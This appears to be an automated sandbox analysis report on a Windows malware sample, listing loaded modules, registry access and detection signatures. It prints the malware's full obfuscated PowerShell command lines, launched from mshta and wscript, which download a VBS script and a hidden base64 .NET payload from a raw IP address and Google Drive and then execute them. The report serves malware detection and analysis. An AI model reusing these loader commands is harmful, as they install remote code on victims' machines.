            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32Jump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SettingsJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
            Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.2102346402.00000000076F7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2212744415.00000000073D0000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: mscorlib.pdb source: powershell.exe, 00000009.00000002.2212744415.00000000073D4000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Core.pdb source: powershell.exe, 00000009.00000002.2212744415.00000000073D4000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.2102626635.000000000776B000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000009.00000002.2214216326.00000000074A6000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \dll\mscorlib.pdb( source: powershell.exe, 00000009.00000002.2213867758.0000000007485000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: l\mscorlib.pdb source: powershell.exe, 00000009.00000002.2213867758.0000000007485000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Core.pdbk source: powershell.exe, 00000009.00000002.2212744415.00000000073D4000.00000004.00000020.00020000.00000000.sdmp

            Data Obfuscation

            barindex
            Found suspicious powershell code related to unpacking or dynamic code loading
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: $Codigo = 'JiAoICRTSEVMbGlkWzFdKyRzaEVsbElkWzEzXSsnWCcpICgoJ2p2TWltYWdlVXJsID0gdUNiaHR0cHM6Ly9kcml2ZS5nb29nbGUuY29tL3VjP2V4cG9ydD1kb3dubG9hZCZpZD0xQUlWZ0pKSnYxRjZ2UzRzVU95Ym5ILXNEdlVoQll3dXIgdUNiO2p2TXdlYkNsaWVudCA9IE5ldy1PYmplYycrJ3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7anZNaW1hZ2VCJysneXRlJysncyA9IGp2TXdlYkNsaWVudC5Eb3dubG9hZERhJysndGEoanZNaW1hZ2VVcmwpO2p2TWltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKGp2TWltYWdlQnl0ZXMpO2p2TXN0YXJ0RmxhZyA9IHVDYjw8QkFTRTY0X1NUQVJUPj51Q2I7anZNZW5kJysnRmxhZyA9IHVDYjw8QkFTRTY0X0VORD4+dUNiO2p2TXN0YXJ0SW5kZXggPSBqdk1pbWFnZVRleHQuSW5kZXhPZihqdk1zdGFydEZsYWcpO2p2TWVuZEluZGV4ID0ganZNaW1hZ2VUZXh0JysnLkluZGV4T2YnKycoanZNZW5kRmxhZyk7anZNc3RhcnRJbmRleCAtZ2UgMCAtYW5kIGp2TWVuZEluZGV4IC1ndCBqdk1zdGFydEluZGV4O2p2TXN0YXJ0SW5kZXggKz0ganZNc3RhcnRGbGFnLkxlbmd0aDtqdk1iYXNlNjRMZW5ndGggPSBqdk1lbmRJJysnbmRleCAtIGp2TXN0YXJ0SW5kZScrJ3g7anZNYmFzZTY0Q29tbWFuZCA9IGp2TWltYWdlVGV4dC5TdWJzdHJpbmcoanZNc3RhcnRJbmRleCwganZNYmFzZTY0TGVuZ3RoKTtqdk0nKydiYXNlNjRSZXZlcnNlZCA9IC1qb2luIChqdk1iYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCcrJykgbnJFIEZvckVhJysnY2gtT2JqZWN0IHsganZNXyB9KVstMS4uLShqdk1iYXNlNjRDb21tYW5kLkxlbmd0aCldO2p2TWNvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoanZNYmFzZTY0UmV2ZXJzZWQpO2p2TWxvYWRlZEFzc2VtYmx5ICcrJz0gW1N5Jysnc3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChqdk1jb21tYW5kQnl0ZXMpO2p2TXZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXScrJy5HZXRNZXRob2QnKycodUNiVkFJdUNiKTtqdk12YWlNZXRob2QuSW52b2tlKGp2TW51bGwsIEAodUNidHh0LicrJ0dST0wnKydMLzY2LzE1MS44NzEuNjQuODkxLycrJy86cHR0aHVDJysnYiwgdUNiZGVzYXRpdmFkb3VDYiwgdUNiZGVzYScrJ3RpdmFkb3VDYiwgdUNiZGVzYXRpdmFkb3VDYicrJywgdUNiYXNwbicrJ2UnKyd0X3JlZ2Jyb3dzZXJzdUNiLCB1Q2JkZXNhdGl2YWRvdUNiLCB1Q2JkZXNhdGl2YWRvdUNiLHVDYmRlc2F0aXZhZG91Q2IsdUNiZGVzYXRpdmFkb3VDYix1Q2JkZXNhdGl2YWRvdUNiLHVDYmRlc2F0aXZhZG91Q2IsdUNiZGVzYScrJ3RpdmFkb3VDYix1Q2IxdUNiLHVDYmRlc2F0aXZhZG91Q2IpKTsnKS5SZXBsQWNlKCdqdk0nLCckJykuUmVwbEFjZSgndUNiJyxbc1RyaW5HXVtjaGFSXTM5KS5SZXBsQWNlKChbY2hhUl0xMTArW2NoYVJdMTE0K1tjaGFSXTY5KSxbc1RyaW5HXVtjaGFSXTEyNCkp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD$global:?
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: Assembly]::Load(jvMcommandBytes);jvMvaiMethod = [dnlib.IO.Home]'+'.GetMethod'+'(uCbVAIuCb);jvMvaiMethod.Invoke(jvMnull, @(uCbtxt.'+'GROL'+'L/66/151.871.64.891/'+'/:ptthuC'+'b, uCbdesativadouCb, uCbdes
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String(jvMbase64Reversed);jvMloadedAssembly '+'= [Sy'+'stem.Reflection.Assembly]::Load(jvMcommandBytes);jvMvaiMethod = [dnlib.IO.Home]'+'.GetMethod'+'(uCbVAIuCb);jvMvaiMethod.Invoke(jvMnull,
            Obfuscated command line found
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $SHELlid[1]+$shEllId[13]+'X') (('jvMimageUrl = uCbhttps://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur uCb;jvMwebClient = New-Objec'+'t System.Net.WebClient;jvMimageB'+'yte'+'s = jvMwebClient.DownloadDa'+'ta(jvMimageUrl);jvMimageText = [System.Text.Encoding]::UTF8.GetString(jvMimageBytes);jvMstartFlag = uCb<<BASE64_START>>uCb;jvMend'+'Flag = uCb<<BASE64_END>>uCb;jvMstartIndex = jvMimageText.IndexOf(jvMstartFlag);jvMendIndex = jvMimageText'+'.IndexOf'+'(jvMendFlag);jvMstartIndex -ge 0 -and jvMendIndex -gt jvMstartIndex;jvMstartIndex += jvMstartFlag.Length;jvMbase64Length = jvMendI'+'ndex - jvMstartInde'+'x;jvMbase64Command = jvMimageText.Substring(jvMstartIndex, jvMbase64Length);jvM'+'base64Reversed = -join (jvMbase64Command.ToCharArray('+') nrE ForEa'+'ch-Object { jvM_ })[-1..-(jvMbase64Command.Length)];jvMcommandBytes = [System.Convert]::FromBase64String(jvMbase64Reversed);jvMloadedAssembly '+'= [Sy'+'stem.Reflection.Assembly]::Load(jvMcommandBytes);jvMvaiMethod = [dnlib.IO.Home]'+'.GetMethod'+'(uCbVAIuCb);jvMvaiMethod.Invoke(jvMnull, @(uCbtxt.'+'GROL'+'L/66/151.871.64.891/'+'/:ptthuC'+'b, uCbdesativadouCb, uCbdesa'+'tivadouCb, uCbdesativadouCb'+', uCbaspn'+'e'+'t_regbrowsersuCb, uCbdesativadouCb, uCbdesativadouCb,uCbdesativadouCb,uCbdesativadouCb,uCbdesativadouCb,uCbdesativadouCb,uCbdesa'+'tivadouCb,uCb1uCb,uCbdesativadouCb));').ReplAce('jvM','$').ReplAce('uCb',[sTrinG][chaR]39).ReplAce(([chaR]110+[chaR]114+[chaR]69),[sTrinG][chaR]124))"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $SHELlid[1]+$shEllId[13]+'X') (('jvMimageUrl = uCbhttps://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur uCb;jvMwebClient = New-Objec'+'t System.Net.WebClient;jvMimageB'+'yte'+'s = jvMwebClient.DownloadDa'+'ta(jvMimageUrl);jvMimageText = [System.Text.Encoding]::UTF8.GetString(jvMimageBytes);jvMstartFlag = uCb<<BASE64_START>>uCb;jvMend'+'Flag = uCb<<BASE64_END>>uCb;jvMstartIndex = jvMimageText.IndexOf(jvMstartFlag);jvMendIndex = jvMimageText'+'.IndexOf'+'(jvMendFlag);jvMstartIndex -ge 0 -and jvMendIndex -gt jvMstartIndex;jvMstartIndex += jvMstartFlag.Length;jvMbase64Length = jvMendI'+'ndex - jvMstartInde'+'x;jvMbase64Command = jvMimageText.Substring(jvMstartIndex, jvMbase64Length);jvM'+'base64Reversed = -join (jvMbase64Command.ToCharArray('+') nrE ForEa'+'ch-Object { jvM_ })[-1..-(jvMbase64Command.Length)];jvMcommandBytes = [System.Convert]::FromBase64String(jvMbase64Reversed);jvMloadedAssembly '+'= [Sy'+'stem.Reflection.Assembly]::Load(jvMcommandBytes);jvMvaiMethod = [dnlib.IO.Home]'+'.GetMethod'+'(uCbVAIuCb);jvMvaiMethod.Invoke(jvMnull, @(uCbtxt.'+'GROL'+'L/66/151.871.64.891/'+'/:ptthuC'+'b, uCbdesativadouCb, uCbdesa'+'tivadouCb, uCbdesativadouCb'+', uCbaspn'+'e'+'t_regbrowsersuCb, uCbdesativadouCb, uCbdesativadouCb,uCbdesativadouCb,uCbdesativadouCb,uCbdesativadouCb,uCbdesativadouCb,uCbdesa'+'tivadouCb,uCb1uCb,uCbdesativadouCb));').ReplAce('jvM','$').ReplAce('uCb',[sTrinG][chaR]39).ReplAce(([chaR]110+[chaR]114+[chaR]69),[sTrinG][chaR]124))"Jump to behavior
            Suspicious powershell command line found
            Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\sYSTEM32\windOWSPowerShell\V1.0\POWeRSHell.eXE" "poweRSheLl.EXe -eX byPASS -noP -W 1 -c dEVicECREdeNtiaLDePlOymenT ; Iex($(IEX('[sYstEm.tExT.enCOding]'+[char]0X3a+[char]0x3A+'UtF8.GETStRIng([sySTEM.convERt]'+[CHAR]58+[CHar]58+'fRoMbase64STriNg('+[Char]0x22+'JFZENmI1TUtGICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFEZC10eVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFcmRFRmlOSXRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJMTW9uLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtHRENPeUFFdkgsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgd3Esc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZkhuSk9PQWdhTCx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZmNMV0JuWCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiS2cpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ3TnZtcExmRlp2IiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lU1BBQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB0cU9kWVBRUCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkVkQ2YjVNS0Y6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTguNDYuMTc4LjE1MS82Ni9zZWVtZXRoZWJlc3R0aGluZ3N3aXRoZ3JlYXRuZWVkc3dpdGhnb29kZm9ybWV3aXRoLnRJRiIsIiRFTnY6QVBQREFUQVxzZWVtZXRoZWJlc3R0aGluZ3N3aXRoZ3JlYXRuZWVkc3dpdGhnby52YnMiLDAsMCk7c3RBcnQtU2xFZXAoMyk7c1RBUlQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVOdjpBUFBEQVRBXHNlZW1ldGhlYmVzdHRoaW5nc3dpdGhncmVhdG5lZWRzd2l0aGdvLnZicyI='+[cHAr]34+'))')))"
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoICRTSEVMbGlkWzFdKyRzaEVsbElkWzEzXSsnWCcpICgoJ2p2TWltYWdlVXJsID0gdUNiaHR0cHM6Ly9kcml2ZS5nb29nbGUuY29tL3VjP2V4cG9ydD1kb3dubG9hZCZpZD0xQUlWZ0pKSnYxRjZ2UzRzVU95Ym5ILXNEdlVoQll3dXIgdUNiO2p2TXdlYkNsaWVudCA9IE5ldy1PYmplYycrJ3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7anZNaW1hZ2VCJysneXRlJysncyA9IGp2TXdlYkNsaWVudC5Eb3dubG9hZERhJysndGEoanZNaW1hZ2VVcmwpO2p2TWltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKGp2TWltYWdlQnl0ZXMpO2p2TXN0YXJ0RmxhZyA9IHVDYjw8QkFTRTY0X1NUQVJUPj51Q2I7anZNZW5kJysnRmxhZyA9IHVDYjw8QkFTRTY0X0VORD4+dUNiO2p2TXN0YXJ0SW5kZXggPSBqdk1pbWFnZVRleHQuSW5kZXhPZihqdk1zdGFydEZsYWcpO2p2TWVuZEluZGV4ID0ganZNaW1hZ2VUZXh0JysnLkluZGV4T2YnKycoanZNZW5kRmxhZyk7anZNc3RhcnRJbmRleCAtZ2UgMCAtYW5kIGp2TWVuZEluZGV4IC1ndCBqdk1zdGFydEluZGV4O2p2TXN0YXJ0SW5kZXggKz0ganZNc3RhcnRGbGFnLkxlbmd0aDtqdk1iYXNlNjRMZW5ndGggPSBqdk1lbmRJJysnbmRleCAtIGp2TXN0YXJ0SW5kZScrJ3g7anZNYmFzZTY0Q29tbWFuZCA9IGp2TWltYWdlVGV4dC5TdWJzdHJpbmcoanZNc3RhcnRJbmRleCwganZNYmFzZTY0TGVuZ3RoKTtqdk0nKydiYXNlNjRSZXZlcnNlZCA9IC1qb2luIChqdk1iYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCcrJykgbnJFIEZvckVhJysnY2gtT2JqZWN0IHsganZNXyB9KVstMS4uLShqdk1iYXNlNjRDb21tYW5kLkxlbmd0aCldO2p2TWNvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoanZNYmFzZTY0UmV2ZXJzZWQpO2p2TWxvYWRlZEFzc2VtYmx5ICcrJz0gW1N5Jysnc3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChqdk1jb21tYW5kQnl0ZXMpO2p2TXZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXScrJy5HZXRNZXRob2QnKycodUNiVkFJdUNiKTtqdk12YWlNZXRob2QuSW52b2tlKGp2TW51bGwsIEAodUNidHh0LicrJ0dST0wnKydMLzY2LzE1MS44NzEuNjQuODkxLycrJy86cHR0aHVDJysnYiwgdUNiZGVzYXRpdmFkb3VDYiwgdUNiZGVzYScrJ3RpdmFkb3VDYiwgdUNiZGVzYXRpdmFkb3VDYicrJywgdUNiYXNwbicrJ2UnKyd0X3JlZ2Jyb3dzZXJzdUNiLCB1Q2JkZXNhdGl2YWRvdUNiLCB1Q2JkZXNhdGl2YWRvdUNiLHVDYmRlc2F0aXZhZG91Q2IsdUNiZGVzYXRpdmFkb3VDYix1Q2JkZXNhdGl2YWRvdUNiLHVDYmRlc2F0aXZhZG91Q2IsdUNiZGVzYScrJ3RpdmFkb3VDYix1Q2IxdUNiLHVDYmRlc2F0aXZhZG91Q2IpKTsnKS5SZXBsQWNlKCdqdk0nLCckJykuUmVwbEFjZSgndUNiJyxbc1RyaW5HXVtjaGFSXTM5KS5SZXBsQWNlKChbY2hhUl0xMTArW2NoYVJdMTE0K1tjaGFSXTY5KSxbc1RyaW5HXVtjaGFSXTEyNCkp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $SHELlid[1]+$shEllId[13]+'X') (('jvMimageUrl = uCbhttps://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur uCb;jvMwebClient = New-Objec'+'t System.Net.WebClient;jvMimageB'+'yte'+'s = jvMwebClient.DownloadDa'+'ta(jvMimageUrl);jvMimageText = [System.Text.Encoding]::UTF8.GetString(jvMimageBytes);jvMstartFlag = uCb<<BASE64_START>>uCb;jvMend'+'Flag = uCb<<BASE64_END>>uCb;jvMstartIndex = jvMimageText.IndexOf(jvMstartFlag);jvMendIndex = jvMimageText'+'.IndexOf'+'(jvMendFlag);jvMstartIndex -ge 0 -and jvMendIndex -gt jvMstartIndex;jvMstartIndex += jvMstartFlag.Length;jvMbase64Length = jvMendI'+'ndex - jvMstartInde'+'x;jvMbase64Command = jvMimageText.Substring(jvMstartIndex, jvMbase64Length);jvM'+'base64Reversed = -join (jvMbase64Command.ToCharArray('+') nrE ForEa'+'ch-Object { jvM_ })[-1..-(jvMbase64Command.Length)];jvMcommandBytes = [System.Convert]::FromBase64String(jvMbase64Reversed);jvMloadedAssembly '+'= [Sy'+'stem.Reflection.Assembly]::Load(jvMcommandBytes);jvMvaiMethod = [dnlib.IO.Home]'+'.GetMethod'+'(uCbVAIuCb);jvMvaiMethod.Invoke(jvMnull, @(uCbtxt.'+'GROL'+'L/66/151.871.64.891/'+'/:ptthuC'+'b, uCbdesativadouCb, uCbdesa'+'tivadouCb, uCbdesativadouCb'+', uCbaspn'+'e'+'t_regbrowsersuCb, uCbdesativadouCb, uCbdesativadouCb,uCbdesativadouCb,uCbdesativadouCb,uCbdesativadouCb,uCbdesativadouCb,uCbdesa'+'tivadouCb,uCb1uCb,uCbdesativadouCb));').ReplAce('jvM','$').ReplAce('uCb',[sTrinG][chaR]39).ReplAce(([chaR]110+[chaR]114+[chaR]69),[sTrinG][chaR]124))"
            Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\sYSTEM32\windOWSPowerShell\V1.0\POWeRSHell.eXE" "poweRSheLl.EXe -eX byPASS -noP -W 1 -c dEVicECREdeNtiaLDePlOymenT ; Iex($(IEX('[sYstEm.tExT.enCOding]'+[char]0X3a+[char]0x3A+'UtF8.GETStRIng([sySTEM.convERt]'+[CHAR]58+[CHar]58+'fRoMbase64STriNg('+[Char]0x22+'JFZENmI1TUtGICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFEZC10eVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFcmRFRmlOSXRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJMTW9uLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtHRENPeUFFdkgsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgd3Esc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZkhuSk9PQWdhTCx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZmNMV0JuWCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiS2cpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ3TnZtcExmRlp2IiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lU1BBQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB0cU9kWVBRUCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkVkQ2YjVNS0Y6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTguNDYuMTc4LjE1MS82Ni9zZWVtZXRoZWJlc3R0aGluZ3N3aXRoZ3JlYXRuZWVkc3dpdGhnb29kZm9ybWV3aXRoLnRJRiIsIiRFTnY6QVBQREFUQVxzZWVtZXRoZWJlc3R0aGluZ3N3aXRoZ3JlYXRuZWVkc3dpdGhnby52YnMiLDAsMCk7c3RBcnQtU2xFZXAoMyk7c1RBUlQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVOdjpBUFBEQVRBXHNlZW1ldGhlYmVzdHRoaW5nc3dpdGhncmVhdG5lZWRzd2l0aGdvLnZicyI='+[cHAr]34+'))')))"Jump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoICRTSEVMbGlkWzFdKyRzaEVsbElkWzEzXSsnWCcpICgoJ2p2TWltYWdlVXJsID0gdUNiaHR0cHM6Ly9kcml2ZS5nb29nbGUuY29tL3VjP2V4cG9ydD1kb3dubG9hZCZpZD0xQUlWZ0pKSnYxRjZ2UzRzVU95Ym5ILXNEdlVoQll3dXIgdUNiO2p2TXdlYkNsaWVudCA9IE5ldy1PYmplYycrJ3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7anZNaW1hZ2VCJysneXRlJysncyA9IGp2TXdlYkNsaWVudC5Eb3dubG9hZERhJysndGEoanZNaW1hZ2VVcmwpO2p2TWltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKGp2TWltYWdlQnl0ZXMpO2p2TXN0YXJ0RmxhZyA9IHVDYjw8QkFTRTY0X1NUQVJUPj51Q2I7anZNZW5kJysnRmxhZyA9IHVDYjw8QkFTRTY0X0VORD4+dUNiO2p2TXN0YXJ0SW5kZXggPSBqdk1pbWFnZVRleHQuSW5kZXhPZihqdk1zdGFydEZsYWcpO2p2TWVuZEluZGV4ID0ganZNaW1hZ2VUZXh0JysnLkluZGV4T2YnKycoanZNZW5kRmxhZyk7anZNc3RhcnRJbmRleCAtZ2UgMCAtYW5kIGp2TWVuZEluZGV4IC1ndCBqdk1zdGFydEluZGV4O2p2TXN0YXJ0SW5kZXggKz0ganZNc3RhcnRGbGFnLkxlbmd0aDtqdk1iYXNlNjRMZW5ndGggPSBqdk1lbmRJJysnbmRleCAtIGp2TXN0YXJ0SW5kZScrJ3g7anZNYmFzZTY0Q29tbWFuZCA9IGp2TWltYWdlVGV4dC5TdWJzdHJpbmcoanZNc3RhcnRJbmRleCwganZNYmFzZTY0TGVuZ3RoKTtqdk0nKydiYXNlNjRSZXZlcnNlZCA9IC1qb2luIChqdk1iYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCcrJykgbnJFIEZvckVhJysnY2gtT2JqZWN0IHsganZNXyB9KVstMS4uLShqdk1iYXNlNjRDb21tYW5kLkxlbmd0aCldO2p2TWNvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoanZNYmFzZTY0UmV2ZXJzZWQpO2p2TWxvYWRlZEFzc2VtYmx5ICcrJz0gW1N5Jysnc3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChqdk1jb21tYW5kQnl0ZXMpO2p2TXZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXScrJy5HZXRNZXRob2QnKycodUNiVkFJdUNiKTtqdk12YWlNZXRob2QuSW52b2tlKGp2TW51bGwsIEAodUNidHh0LicrJ0dST0wnKydMLzY2LzE1MS44NzEuNjQuODkxLycrJy86cHR0aHVDJysnYiwgdUNiZGVzYXRpdmFkb3VDYiwgdUNiZGVzYScrJ3RpdmFkb3VDYiwgdUNiZGVzYXRpdmFkb3VDYicrJywgdUNiYXNwbicrJ2UnKyd0X3JlZ2Jyb3dzZXJzdUNiLCB1Q2JkZXNhdGl2YWRvdUNiLCB1Q2JkZXNhdGl2YWRvdUNiLHVDYmRlc2F0aXZhZG91Q2IsdUNiZGVzYXRpdmFkb3VDYix1Q2JkZXNhdGl2YWRvdUNiLHVDYmRlc2F0aXZhZG91Q2IsdUNiZGVzYScrJ3RpdmFkb3VDYix1Q2IxdUNiLHVDYmRlc2F0aXZhZG91Q2IpKTsnKS5SZXBsQWNlKCdqdk0nLCckJykuUmVwbEFjZSgndUNiJyxbc1RyaW5HXVtjaGFSXTM5KS5SZXBsQWNlKChbY2hhUl0xMTArW2NoYVJdMTE0K1tjaGFSXTY5KSxbc1RyaW5HXVtjaGFSXTEyNCkp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
